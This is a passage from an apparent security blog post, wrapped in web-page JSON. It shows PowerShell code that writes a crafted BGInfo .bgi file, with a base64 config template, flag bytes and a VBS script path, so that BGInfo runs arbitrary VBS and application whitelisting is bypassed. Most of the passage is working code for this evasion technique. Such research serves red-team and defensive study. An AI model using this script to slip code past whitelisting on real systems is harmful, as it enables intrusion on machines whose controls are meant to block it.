powershell to edit binary files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The most common way to read and write files using powershell is:\u003C\u002Fp>\u003Cp>Read file: Get-content\u003C\u002Fp>\u003Cp>Write file: Set-content\u003C\u002Fp>\u003Cp>However, for non-txt files, if special characters exist, the above methods may cause bugs by automatically filtering special strings, resulting in different lengths and content errors\u003C\u002Fp>\u003Cp>Binary file read\u002Fwrite methods:\u003C\u002Fp>\u003Cp>Read binary file:\u003C\u002Fp>\u003Cp>[System.IO.File]::ReadAllBytes('1.txt')\u003C\u002Fp>\u003Cp>Write binary file:\u003C\u002Fp>\u003Cp>[System.IO.File]::WriteAllBytes(\"1.txt\",$fileContentBytes)\u003C\u002Fp>\u003Cp>Modify binary file:\u003C\u002Fp>\u003Cp>Using system.io.filestream\u003C\u002Fp>\u003Cp>Code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(0,2)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Parameter description:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open:\u003C\u002Fp>\u003Cul>\u003Cli>open means append, createnew means create new\u003C\u002Fli>\u003C\u002Ful>\u003Cp>$fs.seek(0,2):\u003C\u002Fp>\u003Cul>\u003Cli>The first parameter indicates offset\u003C\u002Fli>\u003Cli>The second parameter: 0 means starting from the beginning of the file, 1 means starting from the current position, 2 means starting from the end of the file\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x06 Write a PowerShell script to automatically generate .bgi files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Development approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Read the content from 0x00000000 to 0x00000300, perform base64 encoding and save it in variable $fileContent\u003C\u002Fp>\u003Cp>Decode the base64 of variable $fileContent and write it to a new file test1.bgi\u003C\u002Fp>\u003Cp>Use append mode to sequentially write flag bits, vbs paths, and other padding bits to the file\u003C\u002Fp>\u003Cp>\u003Cstrong>Process as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Write the content from 0x00000000 to 0x00000300\u003C\u002Fli>\u003Cli>Calculate flag bits\u003C\u002Fli>\u003Cli>Write flag bits in binary mode\u003C\u002Fli>\u003Cli>Use Out-File to append vbs path to file, but redundant data 0D0A will exist\u003C\u002Fli>\u003Cli>Offset -2, fill other positions in binary mode, overwriting redundant data 0D0A\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Key code as follows:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Save content from 0x00000000-0x00000300 as 1.bgi\u003C\u002Fp>\u003Cp>powershell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = [System.IO.File]::ReadAllBytes('1.bgi')\u003Cbr>$fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content (\"buffer.txt\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generate buffer.txt with the following content:\u003C\u002Fp>\u003Cp>CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA\u002FgMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA==\u003C\u002Fp>\u003Cp>Save it in variable $fileContent, decrypt and write to file test1.bgi\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"CwAAAEJhY2tncm91bmQABAAAAAQAAAAAAAAACQAAAFBvc2l0aW9uAAQAAAAEAAAA\u002FgMAAAgAAABNb25pdG9yAAQAAAAEAAAAXAQAAA4AAABUYXNrYmFyQWRqdXN0AAQAAAAEAAAAAQAAAAsAAABUZXh0V2lkdGgyAAQAAAAEAAAAwHsAAAsAAABPdXRwdXRGaWxlAAEAAAASAAAAJVRlbXAlXEJHSW5mby5ibXAACQAAAERhdGFiYXNlAAEAAAABAAAAAAwAAABEYXRhYmFzZU1SVQABAAAABAAAAAAAAAAKAAAAV2FsbHBhcGVyAAEAAAABAAAAAA0AAABXYWxscGFwZXJQb3MABAAAAAQAAAACAAAADgAAAFdhbGxwYXBlclVzZXIABAAAAAQAAAABAAAADQAAAE1heENvbG9yQml0cwAEAAAABAAAAAAAAAAMAAAARXJyb3JOb3RpZnkABAAAAAQAAAAAAAAACwAAAFVzZXJTY3JlZW4ABAAAAAQAAAABAAAADAAAAExvZ29uU2NyZWVuAAQAAAAEAAAAAAAAAA8AAABUZXJtaW5hbFNjcmVlbgAEAAAABAAAAAAAAAAOAAAAT3BhcXVlVGV4dEJveAAEAAAABAAAAAAAAAAEAAAAUlRGAAEAAADvAAAAe1xydGYxXGFuc2lcYW5zaWNwZzkzNlxkZWZmMFxkZWZsYW5nMTAzM1xkZWZsYW5nZmUyMDUye1xmb250dGJse1xmMFxmbmlsXGZjaGFyc2V0MTM0IEFyaWFsO319DQp7XGNvbG9ydGJsIDtccmVkMjU1XGdyZWVuMjU1XGJsdWUyNTU7fQ0KXHZpZXdraW5kNFx1YzFccGFyZFxmaS0yODgwXGxpMjg4MFx0eDI4ODBcY2YxXGxhbmcyMDUyXGJccHJvdGVjdFxmMFxmczI0IDx2YnM+XHByb3RlY3QwXHBhcg0KXHBhcg0KfQ0KAAALAAAAVXNlckZpZWxkcwAAgACAAAAAAAQAAAB2YnMAAQAAAA==\"\u003Cbr>$fileContentBytes = [System.Convert]::FromBase64String($fileContent)\u003Cbr>[System.IO.File]::WriteAllBytes(\"test1.bgi\",$fileContentBytes)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Flag bit calculation:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$VbsPath=\"C:\\test\\1.vbs\"\u003Cbr>$Length=$VbsPath.Length+2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Write length flag bit + idle padding bits\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(0,2)\u003Cbr>$fs.writebyte($Length)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x34)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Append and write VBS script path:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$VbsPath | Out-File -Encoding ascii -Append test1.bgi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>There is redundant data 0D0A, so the offset should be -2, writing to free padding bits:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fs=new-object io.filestream \"test1.bgi\",open\u003Cbr>$fs.seek(-2,2)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x01)\u003Cbr>$fs.writebyte(0x80)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x80)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.writebyte(0x00)\u003Cbr>$fs.flush()\u003Cbr>$fs.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Complete code has been uploaded to GitHub:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Complete operation as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018017781_10_d6f78f1694-1.png\">\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of bypassing whitelists via BGInfo, along with the technique of editing binary files using PowerShell. It also open-sources a PowerShell script for generating .bgi files, hoping to assist everyone.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1016,"Onedaysec",5,"published","2026-02-02T07:51:00.061Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Bypass App Whitelisting with BGInfo: Study Notes & PowerShell Script","BGInfo, application whitelisting bypass, PowerShell script, .bgi file generation, Sysinternals, VBS script, WMI query, security testing",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],554,552,551,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.785Z","2026-07-23T16:01:44.181Z","draft","2026-07-23T16:13:16.833Z"]